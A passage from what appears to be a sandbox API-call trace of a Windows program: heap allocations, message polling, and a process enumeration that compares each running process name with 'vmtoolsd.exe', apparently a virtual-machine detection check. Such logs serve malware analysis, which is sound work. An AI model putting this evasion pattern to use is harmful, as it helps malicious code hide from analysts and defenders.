lpMsg=0x7df8b4) returned 0 [0121.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0121.681] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.681] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.681] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.682] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.682] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.682] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.682] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.682] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.682] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.682] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.709] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.709] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.709] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.709] FreeLibrary (hLibModule=0x77820000) returned 1 [0121.709] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.709] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.709] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.710] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.710] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.710] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.710] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.710] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.710] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.711] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.739] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0121.739] CharUpperBuffW (in: lpsz="ASAZRREHKGLB", cchLength=0xc | out: lpsz="ASAZRREHKGLB") returned 0xc [0121.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0121.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0121.739] GetLastError () returned 0x0 [0121.739] SetLastError (dwErrCode=0x0) [0121.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0121.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.741] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0121.741] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0121.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0121.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0121.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef760 [0121.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.742] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0121.742] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0121.742] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0121.760] Process32FirstW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0121.761] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0121.762] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0121.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0121.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0121.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0121.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0121.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0121.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0121.764] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="System", cchCount1=6, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.764] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.764] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0121.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0121.767] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0121.767] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0121.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0121.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0121.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd508 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1301068 [0121.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.769] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smss.exe", cchCount1=8, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0121.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.769] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0121.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0121.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0121.771] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0121.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.772] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300dc8 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csrss.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300dc8 | out: hHeap=0x12c0000) returned 1 [0121.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.772] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0121.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0121.773] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0121.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0121.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0121.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wininit.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0121.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0121.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0121.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.776] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, 